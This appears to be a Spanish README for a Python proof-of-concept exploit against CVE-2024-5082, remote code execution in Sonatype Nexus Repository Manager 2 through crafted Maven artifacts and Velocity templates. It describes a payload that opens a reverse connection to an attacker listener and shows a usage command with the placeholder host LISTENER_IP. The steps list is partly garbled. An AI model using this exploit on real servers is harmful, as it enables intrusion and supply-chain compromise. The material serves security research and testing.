
Exploit de prueba de concepto para CVE-2024-5082, una vulnerabilidad de ejecución remota de código en Sonatype Nexus Repository Manager 2 mediante artefactos Maven manipulados y procesamiento de plantillas Velocity.
Este repositorio contiene una prueba de concepto en Python para CVE-2024-5082, una vulnerabilidad de ejecución remota de código en Sonatype Nexus Repository Manager 2.
La vulnerabilidad permite que un usuario con permisos suficientes publique un artefacto Maven especialmente diseñado y lo marque para que sea procesado por el generador de contenido Velocity. Cuando se recupera el artefacto, Nexus evalúa la plantilla Velocity incrustada y puede ejecutar un comando en el contexto de seguridad de la JVM de Nexus.
Según Sonatype:
El comando se ejecuta en el host de Nexus Repository.
Descargar el artefacto afectado desde un servidor de compilación, un servidor de aplicaciones o una estación de trabajo de desarrollo no ejecuta por sí solo el comando incrustado en ese sistema consumidor. Sin embargo, el compromiso de un administrador de repositorios puede crear un riesgo más amplio en la cadena de suministro si un atacante modifica posteriormente artefactos de confianza, entradas de compilación, credenciales o la configuración del repositorio.
El script:
maven-metadata.xml manipulado a un repositorio alojado seleccionado.velocity.La carga útil suministrada crea una conexión TCP saliente desde el host de Nexus hasta la dirección del listener configurada.
El script actual utiliza autenticación básica HTTP y requiere:
python3 cve_2024_5082.py \\
--base-url https://nexus.example.test/nexus \\
--repository security-test-snapshots \\
--username test-user \\
--password 'REDACTED' \\
--lhost LISTENER_IP \\
--lport 8000